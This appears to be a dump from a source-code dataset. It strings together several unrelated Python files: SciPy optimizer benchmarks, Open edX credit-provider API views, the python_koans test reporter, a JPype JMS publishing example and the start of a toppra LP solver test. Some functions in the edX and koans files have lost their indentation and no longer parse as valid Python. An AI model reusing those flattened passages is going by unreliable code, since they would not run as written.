    def run_differentialevolution(self):
        """
        Do an optimization run for differential_evolution
        """
        self.function.nfev = 0

        t0 = time.time()
        res = differential_evolution(self.fun,
                                     self.bounds,
                                     popsize=20)
        t1 = time.time()
        res.success = self.function.success(res.x)
        res.nfev = self.function.nfev
        self.add_result(res, t1 - t0, 'DE')

    def run_dualannealing(self):
        """
        Do an optimization run for dual_annealing
        """
        self.function.nfev = 0

        t0 = time.time()
        # dual_annealing's signature is (func, bounds, ...); passing a
        # positional None before self.bounds handed bounds=None and shifted
        # the bounds into `args`, crashing the solver.
        res = dual_annealing(self.fun,
                             self.bounds)
        t1 = time.time()
        res.success = self.function.success(res.x)
        res.nfev = self.function.nfev
        self.add_result(res, t1 - t0, 'DA')

    def bench_run_global(self, numtrials=50, methods=None):
        """
        Run the optimization tests for the required minimizers.
        """
        if methods is None:
            methods = ['DE', 'basinh.', 'DA']

        method_fun = {'DE': self.run_differentialevolution,
                      'basinh.': self.run_basinhopping,
                      'DA': self.run_dualannealing,}

        for i in range(numtrials):
            for m in methods:
                method_fun[m]()

    def bench_run(self, x0, methods=None, **minimizer_kwargs):
        """do an optimization test starting at x0 for all the optimizers"""
        kwargs = self.minimizer_kwargs
        if methods is None:
            methods = ["COBYLA", 'Powell', 'nelder-mead',
                       'L-BFGS-B', 'BFGS', 'CG', 'TNC', 'SLSQP',
                       "Newton-CG", 'dogleg', 'trust-ncg', 'trust-exact',
                       'trust-krylov', 'trust-constr']

        # L-BFGS-B, BFGS, trust-constr can use gradients, but examine
        # performance when numerical differentiation is used.
        fonly_methods = ["COBYLA", 'Powell', 'nelder-mead', 'L-BFGS-B', 'BFGS',
                         'trust-constr']
        for method in fonly_methods:
            if method not in methods:
                continue
            t0 = time.time()
            res = scipy.optimize.minimize(self.fun, x0, method=method,
                                          **kwargs)
            t1 = time.time()
            self.add_result(res, t1-t0, method)

        gradient_methods = ['L-BFGS-B', 'BFGS', 'CG', 'TNC', 'SLSQP',
                            'trust-constr']
        if self.der is not None:
            for method in gradient_methods:
                if method not in methods:
                    continue
                t0 = time.time()
                res = scipy.optimize.minimize(self.fun, x0, method=method,
                                              jac=self.der, **kwargs)
                t1 = time.time()
                self.add_result(res, t1-t0, method)

        hessian_methods = ["Newton-CG", 'dogleg', 'trust-ncg',
                           'trust-exact', 'trust-krylov', 'trust-constr']
        if self.hess is not None:
            for method in hessian_methods:
                if method not in methods:
                    continue
                t0 = time.time()
                res = scipy.optimize.minimize(self.fun, x0, method=method,
                                              jac=self.der, hess=self.hess,
                                              **kwargs)
                t1 = time.time()
                self.add_result(res, t1-t0, method)
class BenchSmoothUnbounded(Benchmark):
    """Benchmark the optimizers with smooth, unbounded, functions"""
    params = [
        ['rosenbrock_slow', 'rosenbrock_nograd', 'rosenbrock', 'rosenbrock_tight',
         'simple_quadratic', 'asymmetric_quadratic',
         'sin_1d', 'booth', 'beale', 'LJ'],
        ["COBYLA", 'Powell', 'nelder-mead',
         'L-BFGS-B', 'BFGS', 'CG', 'TNC', 'SLSQP',
         "Newton-CG", 'dogleg', 'trust-ncg', 'trust-exact',
         'trust-krylov', 'trust-constr'],
        ["mean_nfev", "mean_time"]
    ]
    param_names = ["test function", "solver", "result type"]

    def setup(self, func_name, method_name, ret_val):
        b = getattr(self, 'run_' + func_name)(methods=[method_name])
        r = b.average_results().get(method_name)
        if r is None:
            raise NotImplementedError()
        self.result = getattr(r, ret_val)

    def track_all(self, func_name, method_name, ret_val):
        return self.result

    @staticmethod
    def _run_trials(bench, low, high, ndim, methods, ntrials=10):
        """Drive `bench` from `ntrials` random starting points drawn
        uniformly from [low, high]^ndim, then return it.  Shared tail of
        every run_* method below (previously duplicated ten times)."""
        for _ in range(ntrials):
            bench.bench_run(np.random.uniform(low, high, ndim),
                            methods=methods)
        return bench

    # SlowRosen has a 50us delay on each function evaluation. By comparing to
    # rosenbrock_nograd it should be possible to figure out how much time a
    # minimizer uses internally, compared to the time required for function
    # evaluation.
    def run_rosenbrock_slow(self, methods=None):
        s = funcs.SlowRosen()
        b = _BenchOptimizers("Rosenbrock function",
                             fun=s.fun)
        return self._run_trials(b, -3, 3, 3, methods)

    # see what the performance of the solvers are if numerical differentiation
    # has to be used.
    def run_rosenbrock_nograd(self, methods=None):
        b = _BenchOptimizers("Rosenbrock function",
                             fun=rosen)
        return self._run_trials(b, -3, 3, 3, methods)

    def run_rosenbrock(self, methods=None):
        b = _BenchOptimizers("Rosenbrock function",
                             fun=rosen, der=rosen_der, hess=rosen_hess)
        return self._run_trials(b, -3, 3, 3, methods)

    def run_rosenbrock_tight(self, methods=None):
        b = _BenchOptimizers("Rosenbrock function",
                             fun=rosen, der=rosen_der, hess=rosen_hess,
                             tol=1e-8)
        return self._run_trials(b, -3, 3, 3, methods)

    def run_simple_quadratic(self, methods=None):
        s = funcs.SimpleQuadratic()
        b = _BenchOptimizers("simple quadratic function",
                             fun=s.fun, der=s.der, hess=s.hess)
        return self._run_trials(b, -2, 2, 3, methods)

    def run_asymmetric_quadratic(self, methods=None):
        s = funcs.AsymmetricQuadratic()
        b = _BenchOptimizers("function sum(x**2) + x[0]",
                             fun=s.fun, der=s.der, hess=s.hess)
        return self._run_trials(b, -2, 2, 3, methods)

    def run_sin_1d(self, methods=None):
        fun = lambda x: np.sin(x[0])
        der = lambda x: np.array([np.cos(x[0])])
        b = _BenchOptimizers("1d sin function",
                             fun=fun, der=der, hess=None)
        return self._run_trials(b, -2, 2, 1, methods)

    def run_booth(self, methods=None):
        s = funcs.Booth()
        b = _BenchOptimizers("Booth's function",
                             fun=s.fun, der=s.der, hess=None)
        return self._run_trials(b, 0, 10, 2, methods)

    def run_beale(self, methods=None):
        s = funcs.Beale()
        b = _BenchOptimizers("Beale's function",
                             fun=s.fun, der=s.der, hess=None)
        return self._run_trials(b, 0, 10, 2, methods)

    def run_LJ(self, methods=None):
        s = funcs.LJ()
        natoms = 4
        b = _BenchOptimizers("%d atom Lennard Jones potential" % (natoms),
                             fun=s.fun, der=s.der, hess=None)
        return self._run_trials(b, -2, 2, natoms * 3, methods)
class BenchLeastSquares(Benchmark):
    """Class for benchmarking nonlinear least squares solvers."""
    problems = extract_lsq_problems()
    params = [
        list(problems.keys()),
        ["average time", "nfev", "success"]
    ]
    param_names = [
        "problem", "result type"
    ]

    def track_all(self, problem_name, result_type):
        problem = self.problems[problem_name]
        # `leastsq` handles unconstrained problems only.
        if problem.lb is not None or problem.ub is not None:
            raise NotImplementedError
        ftol = 1e-5

        if result_type == 'average time':
            n_runs = 10
            start = time.time()
            for _ in range(n_runs):
                leastsq(problem.fun, problem.x0, Dfun=problem.jac, ftol=ftol,
                        full_output=True)
            return (time.time() - start) / n_runs

        solution, _cov_x, info, _message, _ier = leastsq(
            problem.fun, problem.x0, Dfun=problem.jac,
            ftol=ftol, full_output=True
        )
        if result_type == 'nfev':
            return info['nfev']
        if result_type == 'success':
            return int(problem.check_answer(solution, ftol))
        raise NotImplementedError
try:
    # the value of SCIPY_XSLOW is used to control how many repeats of each
    # function
    slow = int(os.environ.get('SCIPY_XSLOW', 0))
except ValueError:
    # A non-integer SCIPY_XSLOW previously left `slow` undefined, so the
    # `if not slow` checks below raised NameError; treat it as "disabled".
    slow = 0

_func_names = os.environ.get('SCIPY_GLOBAL_BENCH', [])
if _func_names:
    # An explicit function list implies the user wants the slow benchmarks.
    if not slow:
        slow = 100
    _func_names = [x.strip() for x in _func_names.split(',')]
class BenchGlobal(Benchmark):
    """
    Benchmark the global optimizers using the go_benchmark_functions
    suite
    """
    timeout = 300

    # Collect every benchmark-function class exported by
    # go_benchmark_functions, skipping the abstract base class and the
    # "Problem*" helpers.  NOTE: the exclusion previously read
    # `item[0] not in ('Benchmark')` — a *string* (missing comma), so it was
    # a substring test rather than tuple membership; fixed to a 1-tuple.
    _functions = OrderedDict([
        item for item in inspect.getmembers(gbf, inspect.isclass)
        if (issubclass(item[1], gbf.Benchmark) and
            item[0] not in ('Benchmark',) and
            not item[0].startswith('Problem'))
    ])

    if _func_names:
        # SCIPY_GLOBAL_BENCH restricts the run to an explicit list of names.
        _filtered_funcs = OrderedDict()
        for name in _func_names:
            if name in _functions:
                _filtered_funcs[name] = _functions.get(name)
        _functions = _filtered_funcs

    if not slow:
        # Benchmarks disabled (SCIPY_XSLOW unset): keep a single placeholder
        # entry so asv can still enumerate the parameter grid.
        _functions = {'AMGM': None}

    params = [
        list(_functions.keys()),
        ["success%", "<nfev>"],
        ['DE', 'basinh.', 'DA'],
    ]
    param_names = ["test function", "result type", "solver"]

    def __init__(self):
        self.enabled = bool(slow)
        self.numtrials = slow
        # Results are persisted to JSON so interrupted runs can be resumed
        # and already-benchmarked (function, solver) pairs reused.
        self.dump_fn = os.path.join(os.path.dirname(__file__), '..', 'global-bench-results.json')
        self.results = {}

    def setup(self, name, ret_value, solver):
        if not self.enabled:
            print("BenchGlobal.track_all not enabled --- export SCIPY_XSLOW=slow to enable,\n"
                  "'slow' iterations of each benchmark will be run.\n"
                  "Note that it can take several hours to run; intermediate output\n"
                  "can be found under benchmarks/global-bench-results.json\n"
                  "You can specify functions to benchmark via SCIPY_GLOBAL_BENCH=AMGM,Adjiman,...")
            raise NotImplementedError()
        # load json backing file
        with open(self.dump_fn, 'r') as f:
            self.results = json.load(f)

    def teardown(self, name, ret_value, solver):
        with open(self.dump_fn, 'w') as f:
            json.dump(self.results, f, indent=2, sort_keys=True)

    def track_all(self, name, ret_value, solver):
        if name in self.results and solver in self.results[name]:
            # have we done the function, and done the solver?
            # if so, then just return the ret_value
            av_results = self.results[name]
            if ret_value == 'success%':
                return 100 * av_results[solver]['nsuccess'] / av_results[solver]['ntrials']
            elif ret_value == '<nfev>':
                return av_results[solver]['mean_nfev']
            else:
                raise ValueError()

        klass = self._functions[name]
        f = klass()
        try:
            b = _BenchOptimizers.from_funcobj(name, f)
            with np.errstate(all='ignore'):
                b.bench_run_global(methods=[solver],
                                   numtrials=self.numtrials)
            av_results = b.average_results()
            if name not in self.results:
                self.results[name] = {}
            self.results[name][solver] = av_results[solver]
            if ret_value == 'success%':
                return 100 * av_results[solver]['nsuccess'] / av_results[solver]['ntrials']
            elif ret_value == '<nfev>':
                return av_results[solver]['mean_nfev']
            else:
                raise ValueError()
        except Exception:
            print("".join(traceback.format_exc()))
            # NOTE(review): this replaces the per-solver dict for `name` with
            # the traceback string and implicitly returns None — presumably a
            # deliberate failure marker; confirm before relying on it.
            self.results[name] = "".join(traceback.format_exc())

    def setup_cache(self):
        if not self.enabled:
            return
        # create the logfile to start with
        with open(self.dump_fn, 'w') as f:
            json.dump({}, f, indent=2)
| bsd-3-clause |
4eek/edx-platform | openedx/core/djangoapps/credit/views.py | 9 | 13671 | """
Views for the credit Django app.
"""
import json
import datetime
import logging
from django.conf import settings
from django.http import (
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
Http404
)
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST, require_GET
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
import pytz
from rest_framework import viewsets, mixins, permissions, authentication
from util.json_request import JsonResponse
from util.date_utils import from_timestamp
from openedx.core.djangoapps.credit import api
from openedx.core.djangoapps.credit.exceptions import CreditApiBadRequest, CreditRequestNotFound
from openedx.core.djangoapps.credit.models import CreditCourse
from openedx.core.djangoapps.credit.serializers import CreditCourseSerializer
from openedx.core.djangoapps.credit.signature import signature, get_shared_secret_key
log = logging.getLogger(__name__)
@require_GET
def get_providers_detail(request):
    """
    Return details of credit providers, optionally filtered by identifier.

    **Parameters:**

        * provider_id: comma-separated list of provider identifiers.  When
          omitted, every known provider is returned.

    **Example Usage:**

        GET /api/credit/v1/providers?provider_id=asu,hogwarts

    **Responses:**

        * 200 OK: JSON-encoded list of provider dictionaries (id,
          display_name, url, status_url, description, enable_integration,
          fulfillment_instructions).
        * 404 Not Found: A requested provider does not exist.
    """
    requested_ids = request.GET.get("provider_id")
    id_list = requested_ids.split(",") if requested_ids else None
    return JsonResponse(api.get_credit_providers(id_list))
@require_POST
def create_credit_request(request, provider_id):
    """
    Initiate a request for credit in a course.

    Gets-or-creates a tracking record, computes the parameters the credit
    provider expects, and digitally signs them with the shared secret key.
    The user's browser is responsible for POSTing the returned parameters
    directly to the credit provider.

    **Example Usage:**

        POST /api/credit/v1/providers/hogwarts/request/
        {
            "username": "ron",
            "course_key": "edX/DemoX/Demo_Course"
        }

    **Parameters:**

        * username (unicode): The username of the user requesting credit.
        * course_key (unicode): The identifier of the course for which the
          user is requesting credit.

    **Responses:**

        * 200 OK: JSON-encoded dictionary describing what the client should
          send to the credit provider (url, method, signed parameters).
        * 400 Bad Request: invalid course key, or the user already has a
          completed request for this course and provider.
        * 403 Not Authorized: username does not match the logged-in user,
          or the user is not eligible for credit in the course.
        * 404 Not Found: the provider does not exist.
    """
    response, parameters = _validate_json_parameters(request.body, ["username", "course_key"])
    if response is not None:
        return response

    raw_course_key = parameters["course_key"]
    try:
        course_key = CourseKey.from_string(raw_course_key)
    except InvalidKeyError:
        return HttpResponseBadRequest(
            u'Could not parse "{course_key}" as a course key'.format(
                course_key=raw_course_key
            )
        )

    # Users may only initiate credit requests for themselves.
    is_own_request = request.user and request.user.username == parameters["username"]
    if not is_own_request:
        log.warning(
            u'User with ID %s attempted to initiate a credit request for user with username "%s"',
            request.user.id if request.user else "[Anonymous]",
            parameters["username"]
        )
        return HttpResponseForbidden("Users are not allowed to initiate credit requests for other users.")

    # Initiate the request
    try:
        credit_request = api.create_credit_request(course_key, provider_id, parameters["username"])
    except CreditApiBadRequest as ex:
        return HttpResponseBadRequest(ex)
    return JsonResponse(credit_request)
@require_POST
@csrf_exempt
def credit_provider_callback(request, provider_id):
    """
    Callback end-point used by credit providers to approve or reject
    a request for credit.

    **Example Usage:**

        POST /api/credit/v1/providers/{provider-id}/callback
        {
            "request_uuid": "557168d0f7664fe59097106c67c3f847",
            "status": "approved",
            "timestamp": 1434631630,
            "signature": "cRCNjkE4IzY+erIjRwOQCpRILgOvXx4q2qvx141BCqI="
        }

    **Parameters:**

        * request_uuid (string): The UUID of the request.
        * status (string): Either "approved" or "rejected".
        * timestamp (int or string): Seconds since the Unix epoch at which
          the POST was made; strings are converted to integers.
        * signature (string): Digital signature of the parameters, created
          with the secret key shared with the credit provider.

    **Responses:**

        * 200 OK: The user's status was updated successfully.
        * 400 Bad Request: JSON-encoded description of the invalid input.
        * 403 Forbidden: Invalid signature or stale timestamp.
        * 404 Not Found: No request with that UUID for this provider.
    """
    response, parameters = _validate_json_parameters(request.body, [
        "request_uuid", "status", "timestamp", "signature"
    ])
    if response is not None:
        return response

    # The signature check comes first: it proves the message came from the
    # credit provider and has not been tampered with.
    failure = _validate_signature(parameters, provider_id)
    if failure is not None:
        return failure

    # Then reject stale notifications.
    failure = _validate_timestamp(parameters["timestamp"], provider_id)
    if failure is not None:
        return failure

    # Update the credit request status
    try:
        api.update_credit_request_status(parameters["request_uuid"], provider_id, parameters["status"])
    except CreditRequestNotFound:
        raise Http404
    except CreditApiBadRequest as ex:
        return HttpResponseBadRequest(ex)
    return HttpResponse()
@require_GET
def get_eligibility_for_user(request):
    """
    Retrieve a user's credit eligibility for a course.

    **Parameters:**

        * course_key (unicode): Identifier of the course.
        * username (unicode): Username of the current user.

    **Example Usage:**

        GET /api/credit/v1/eligibility?username=user&course_key=edX/Demo_101/Fall

    **Responses:**

        * 200 OK: JSON-encoded eligibility record(s), e.g.
          {"course_key": "edX/Demo_101/Fall", "deadline": "2015-10-23"}.
    """
    return JsonResponse(api.get_eligibilities_for_user(
        username=request.GET.get("username"),
        course_key=request.GET.get("course_key"),
    ))
def _validate_json_parameters(params_string, expected_parameters):
"""
Load the request parameters as a JSON dictionary and check that
all required paramters are present.
Arguments:
params_string (unicode): The JSON-encoded parameter dictionary.
expected_parameters (list): Required keys of the parameters dictionary.
Returns: tuple of (HttpResponse, dict)
"""
try:
parameters = json.loads(params_string)
except (TypeError, ValueError):
return HttpResponseBadRequest("Could not parse the request body as JSON."), None
if not isinstance(parameters, dict):
return HttpResponseBadRequest("Request parameters must be a JSON-encoded dictionary."), None
missing_params = set(expected_parameters) - set(parameters.keys())
if missing_params:
msg = u"Required parameters are missing: {missing}".format(missing=u", ".join(missing_params))
return HttpResponseBadRequest(msg), None
return None, parameters
def _validate_signature(parameters, provider_id):
    """
    Check that the signature from the credit provider is valid.

    Arguments:
        parameters (dict): Parameters received from the credit provider.
        provider_id (unicode): Identifier for the credit provider.

    Returns:
        HttpResponseForbidden or None (None means the signature is valid).
    """
    secret_key = get_shared_secret_key(provider_id)
    if secret_key is None:
        log.error(
            (
                u'Could not retrieve secret key for credit provider with ID "%s". '
                u'Since no key has been configured, we cannot validate requests from the credit provider.'
            ), provider_id
        )
        return HttpResponseForbidden("Credit provider credentials have not been configured.")

    if signature(parameters, secret_key) != parameters["signature"]:
        # Log the provider's ID — the message format expects it; previously
        # the (attacker-supplied) signature value was logged here instead.
        log.warning(u'Request from credit provider with ID "%s" had an invalid signature', provider_id)
        return HttpResponseForbidden("Invalid signature.")
def _validate_timestamp(timestamp_value, provider_id):
    """
    Check that the timestamp of the request is recent.

    Arguments:
        timestamp_value (int or string): Seconds since Jan. 1, 1970 UTC;
            strings are converted to integers.
        provider_id (unicode): Identifier for the credit provider.

    Returns:
        HttpResponse or None (None means the timestamp is acceptable).
    """
    parsed = from_timestamp(timestamp_value)
    if parsed is None:
        msg = u'"{timestamp}" is not a valid timestamp'.format(timestamp=timestamp_value)
        log.warning(msg)
        return HttpResponseBadRequest(msg)

    # Check that the timestamp is recent
    age_seconds = (datetime.datetime.now(pytz.UTC) - parsed).total_seconds()
    if age_seconds > settings.CREDIT_PROVIDER_TIMESTAMP_EXPIRATION:
        log.warning(
            (
                u'Timestamp %s is too far in the past (%s seconds), '
                u'so we are rejecting the notification from the credit provider "%s".'
            ),
            timestamp_value, age_seconds, provider_id,
        )
        return HttpResponseForbidden(u"Timestamp is too far in the past.")
class CreditCourseViewSet(mixins.CreateModelMixin, mixins.UpdateModelMixin, viewsets.ReadOnlyModelViewSet):
    """ CreditCourse endpoints. """
    # URL lookups use the serialized course key rather than the numeric PK.
    lookup_field = 'course_key'
    lookup_value_regex = settings.COURSE_KEY_REGEX
    queryset = CreditCourse.objects.all()
    serializer_class = CreditCourseSerializer
    authentication_classes = (authentication.OAuth2Authentication, authentication.SessionAuthentication,)
    # Reads and writes are restricted to authenticated admin users.
    permission_classes = (permissions.IsAuthenticated, permissions.IsAdminUser)
    # This CSRF exemption only applies when authenticating without SessionAuthentication.
    # SessionAuthentication will enforce CSRF protection.
    @method_decorator(csrf_exempt)
    def dispatch(self, request, *args, **kwargs):
        # Convert the course ID/key from a string to an actual CourseKey object.
        course_id = kwargs.get(self.lookup_field, None)
        if course_id:
            kwargs[self.lookup_field] = CourseKey.from_string(course_id)
        return super(CreditCourseViewSet, self).dispatch(request, *args, **kwargs)
| agpl-3.0 |
sjb3/python_koans | python2/runner/sensei.py | 51 | 9889 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import re
import sys
import os
import glob
import helper
from mockable_test_result import MockableTestResult
from runner import path_to_enlightenment
from libs.colorama import init, Fore, Style
init() # init colorama
class Sensei(MockableTestResult):
    def __init__(self, stream):
        unittest.TestResult.__init__(self)
        self.stream = stream  # output stream for all progress/teaching text
        self.prevTestClassName = None  # last koan class announced
        # Ordered suite of koans to walk through.
        self.tests = path_to_enlightenment.koans()
        self.pass_count = 0  # koans passed so far
        self.lesson_pass_count = 0  # koan classes ("lessons") entered
        self.all_lessons = None
    def startTest(self, test):
        MockableTestResult.startTest(self, test)
        # Announce each koan class the first time a test from it starts,
        # but only while no failure has occurred yet.
        if helper.cls_name(test) != self.prevTestClassName:
            self.prevTestClassName = helper.cls_name(test)
            if not self.failures:
                self.stream.writeln()
                self.stream.writeln("{0}{1}Thinking {2}".format(
                    Fore.RESET, Style.NORMAL, helper.cls_name(test)))
                # The intro and extra-credit classes do not count as lessons.
                if helper.cls_name(test) not in ['AboutAsserts', 'AboutExtraCredit']:
                    self.lesson_pass_count += 1
    def addSuccess(self, test):
        # Only record successes up to the first failing class; later passes
        # are ignored (see passesCount).
        if self.passesCount():
            MockableTestResult.addSuccess(self, test)
            self.stream.writeln( \
                " {0}{1}{2} has expanded your awareness.{3}{4}" \
                .format(Fore.GREEN, Style.BRIGHT, test._testMethodName, \
                Fore.RESET, Style.NORMAL))
            self.pass_count += 1
    def addError(self, test, err):
        """Record an error exactly like a failure."""
        # Having 1 list for errors and 1 list for failures would mess with
        # the error sequence
        self.addFailure(test, err)
def passesCount(self):
return not (self.failures and helper.cls_name(self.failures[0][0]) !=
self.prevTestClassName)
    def addFailure(self, test, err):
        """Record a failed koan via the base result class."""
        MockableTestResult.addFailure(self, test, err)
def sortFailures(self, testClassName):
table = list()
for test, err in self.failures:
if helper.cls_name(test) == testClassName:
m = re.search("(?<= line )\d+" ,err)
if m:
tup = (int(m.group(0)), test, err)
table.append(tup)
if table:
return sorted(table)
else:
return None
def firstFailure(self):
if not self.failures: return None
table = self.sortFailures(helper.cls_name(self.failures[0][0]))
if table:
return (table[0][1], table[0][2])
else:
return None
    def learn(self):
        # Show the first failure (if any), then summarize progress.
        self.errorReport()
        self.stream.writeln("")
        self.stream.writeln("")
        self.stream.writeln(self.report_progress())
        if self.failures:
            self.stream.writeln(self.report_remaining())
        self.stream.writeln("")
        self.stream.writeln(self.say_something_zenlike())
        # Non-zero exit code signals "not yet enlightened" to the runner.
        if self.failures: sys.exit(-1)
        self.stream.writeln(
            "\n{0}**************************************************" \
            .format(Fore.RESET))
        self.stream.writeln("\n{0}That was the last one, well done!" \
            .format(Fore.MAGENTA))
        self.stream.writeln(
            "\nIf you want more, take a look at about_extra_credit_task.py")
def errorReport(self):
    """Describe the first failure: koan name, assertion text, stack frames."""
    problem = self.firstFailure()
    if not problem: return
    test, err = problem
    self.stream.writeln(" {0}{1}{2} has damaged your "
        "karma.".format(Fore.RED, Style.BRIGHT, test._testMethodName))
    self.stream.writeln("\n{0}{1}You have not yet reached enlightenment ..." \
        .format(Fore.RESET, Style.NORMAL))
    # The assertion message, in bright red.
    self.stream.writeln("{0}{1}{2}".format(Fore.RED, \
        Style.BRIGHT, self.scrapeAssertionError(err)))
    self.stream.writeln("")
    self.stream.writeln("{0}{1}Please meditate on the following code:" \
        .format(Fore.RESET, Style.NORMAL))
    # The koans-only portion of the traceback, in bright yellow.
    self.stream.writeln("{0}{1}{2}{3}{4}".format(Fore.YELLOW, Style.BRIGHT, \
        self.scrapeInterestingStackDump(err), Fore.RESET, Style.NORMAL))
def scrapeAssertionError(self, err):
    """Extract the assertion-error text from a traceback string.

    Skips everything up to and including the first top-level
    (unindented) line, then returns the remaining lines re-indented
    with a single leading space.
    """
    if not err:
        return ""
    toplevel_lines_seen = 0
    collected = []
    for line in err.splitlines():
        # A "top-level" line is non-empty and starts with neither a
        # space nor a caret marker.
        if re.search("^[^^ ].*$", line):
            toplevel_lines_seen += 1
        if toplevel_lines_seen > 1:
            collected.append((" " + line.strip()).rstrip())
    return "\n".join(collected).strip('\n')
def scrapeInterestingStackDump(self, err):
    """Reduce a traceback to its koans-relevant frames, colorized.

    Pass 1 keeps 'File ...' header lines (each starting a new output
    line) and their indented source lines (tagged with a sentinel so
    they can be split back out).  Pass 2 keeps only frames located in a
    koans/ directory.  Finally, file names and line numbers are
    highlighted in blue.
    """
    if not err:
        return ""
    lines = err.splitlines()

    sep = '@@@@@SEP@@@@@'
    stack_text = ""
    for line in lines:
        # Frame header, e.g. ' File "about_x.py", line 12, in test_y'.
        m = re.search("^ File .*$",line)
        if m and m.group(0):
            stack_text += '\n' + line
        # Indented source line belonging to the frame above.
        m = re.search("^ \w(\w)+.*$",line)
        if m and m.group(0):
            stack_text += sep + line
    lines = stack_text.splitlines()
    stack_text = ""
    for line in lines:
        # Keep only frames inside a koans/ directory (either separator).
        m = re.search("^.*[/\\\\]koans[/\\\\].*$",line)
        if m and m.group(0):
            stack_text += line + '\n'
    stack_text = stack_text.replace(sep, '\n').strip('\n')
    # Highlight 'about_*.py' file names and 'line NN' in blue.
    stack_text = re.sub(r'(about_\w+.py)',
        r"{0}\1{1}".format(Fore.BLUE, Fore.YELLOW), stack_text)
    stack_text = re.sub(r'(line \d+)',
        r"{0}\1{1}".format(Fore.BLUE, Fore.YELLOW), stack_text)
    return stack_text
def report_progress(self):
    """Summarize how many koans and lessons have been completed so far."""
    completed = (self.pass_count, self.lesson_pass_count)
    return "You have completed %s koans and %s lessons." % completed
def report_remaining(self):
    """Summarize how many koans and lessons are still unsolved."""
    koans_left = self.total_koans() - self.pass_count
    lessons_left = self.total_lessons() - self.lesson_pass_count
    return ("You are now %s koans and %s lessons away from "
            "reaching enlightenment." % (koans_left, lessons_left))
# Hat's tip to Tim Peters for the zen statements from The 'Zen
# of Python' (http://www.python.org/dev/peps/pep-0020/)
#
# Also a hat's tip to Ara T. Howard for the zen statements from his
# metakoans Ruby Quiz (http://rubyquiz.com/quiz67.html) and
# Edgecase's later permutation in the Ruby Koans
def say_something_zenlike(self):
    """Pick a Zen-of-Python aphorism keyed to progress, or gloat when done."""
    if not self.failures:
        return "{0}Nobody ever expects the Spanish Inquisition." \
            .format(Fore.CYAN)

    sayings = (
        "Beautiful is better than ugly.",
        "Explicit is better than implicit.",
        "Simple is better than complex.",
        "Complex is better than complicated.",
        "Flat is better than nested.",
        "Sparse is better than dense.",
        "Readability counts.",
        "Special cases aren't special enough to "
        "break the rules.",
        "Although practicality beats purity.",
        "Errors should never pass silently.",
        "Unless explicitly silenced.",
        "In the face of ambiguity, refuse the "
        "temptation to guess.",
        "There should be one-- and preferably only "
        "one --obvious way to do it.",
        "Although that way may not be obvious at "
        "first unless you're Dutch.",
        "Now is better than never.",
        "Although never is often better than right "
        "now.",
        "If the implementation is hard to explain, "
        "it's a bad idea.",
        "If the implementation is easy to explain, "
        "it may be a good idea.",
        "Namespaces are one honking great idea -- "
        "let's do more of those!",
    )

    # Original mapping: turn 0 -> sayings[0]; turns (1,2) -> [1],
    # (3,4) -> [2], ..., (33,34) -> [17]; anything else (35,36) -> [18].
    turn = self.pass_count % 37
    if turn == 0:
        zenness = sayings[0]
    elif turn <= 34:
        zenness = sayings[(turn + 1) // 2]
    else:
        zenness = sayings[18]
    return "{0}{1}{2}{3}".format(Fore.CYAN, zenness, Fore.RESET, Style.NORMAL)
    # Hopefully this will never ever happen!
    return "The temple is collapsing! Run!!!"
def total_lessons(self):
    """Count the lesson files, or 0 when none are found."""
    lessons = self.filter_all_lessons()
    return len(lessons) if lessons else 0
def total_koans(self):
    """Total number of koan test cases in the loaded suite."""
    return self.tests.countTestCases()
def filter_all_lessons(self):
    """Glob and cache the lesson files, excluding the extra-credit koan.

    Returns the cached list of about*.py paths (possibly empty).
    """
    cur_dir = os.path.split(os.path.realpath(__file__))[0]
    if not self.all_lessons:
        self.all_lessons = glob.glob('{0}/../koans/about*.py'.format(cur_dir))
        # Materialize as a list: on Python 3, filter() returns a lazy
        # iterator, which breaks len() in total_lessons() and would be
        # exhausted after a single pass despite being cached here.
        self.all_lessons = [filename for filename in self.all_lessons
                            if "about_extra_credit" not in filename]
    return self.all_lessons
| mit |
tomaslaz/Analysis-Toolkit | thirdparty/JPype-0.5.4.2/examples/jms/testJpypePublisher.py | 4 | 1213 | from jpype import *
import time
NUMMSGS = 10
def pyPublisher (javaNamingFactory="weblogic.jndi.WLInitialContextFactory",
                 javaNamingProvider="t3://158.188.40.21:7001",
                 connectionFactory="weblogic.jms.ConnectionFactory",
                 topicName="defaultTopic"):
    """Build a JMS publisher via the 'messaging' Java package.

    NOTE(review): relies on the module-level 'messaging' JPackage that is
    created after startJVM() below runs -- calling this earlier fails.
    """
    return messaging.JpypePublisher(javaNamingFactory,javaNamingProvider,
                                    connectionFactory,topicName)
## Startup Jpype and import the messaging java package
# NOTE(review): Python 2 script with machine-specific, hard-coded JVM and
# classpath locations -- adjust per installation before running.
startJVM("C:\\program files\\Java\\j2re1.4.2_02\\bin\\client\\jvm.dll",
         "-Djava.class.path=D:/jIRAD/JpypeJMS/src;D:/jIRAD/JpypeJMS/classes;C:/bea/weblogic81/server/lib/weblogic.jar")

messaging = JPackage('messaging')

# Get a publisher
publisher = pyPublisher()

## Timing test
# The "Start" message signals the subscriber to start timing message receipts
publisher.publish("Start")
t0 = time.time()
for i in range(NUMMSGS):
    publisher.publish("Hello World! %s"%i)
# Messages per second over the send loop (Python 2 print statement).
print "MessageRate =",float(NUMMSGS)/(time.time()-t0)

# The "Stop" message signals the subscriber to stop timing message receipts
publisher.publish("Stop")

# Close and quit
publisher.close()
shutdownJVM()
| gpl-3.0 |
hungpham2511/toppra | tests/tests/lpsolvers/seidel/test_lp2d.py | 1 | 8272 | import toppra.solverwrapper.cy_seidel_solverwrapper as seidel
import numpy as np
from numpy import array
import pytest
import cvxpy as cvx
# Hand-built LP instances for seidel.solve_lp2d.  Each tuple is
# (v, a, b, c, low, high, active_c,
#  res_expected, optval_expected, optvar_expected, active_c_expected);
# a/b/c of None means "bound constraints only".
testdata_correct = [
    ([1, 2, 3.0], None, None, None, [-1, -1], [1, 1], [-1, 1],
     1, 6, [1, 1], [-2, -4]),

    ([-2, 2, 2.0], None, None, None, [-1, -1], [1, 1], [-1, 1],
     1, 6, [-1, 1], [-1, -4]),

    ([1, 2, 3], (1, -1), (1, 1), (-1, -0.5), [-1, -1], [1, 1], [-1, -1],
     1, 4.75, [0.25, 0.75], [0, 1]),

    ([-1, 0.01, 0], (1, -1), (1, 1), (-1, -0.5), [-1, -1], [1, 1], [-1, -1],
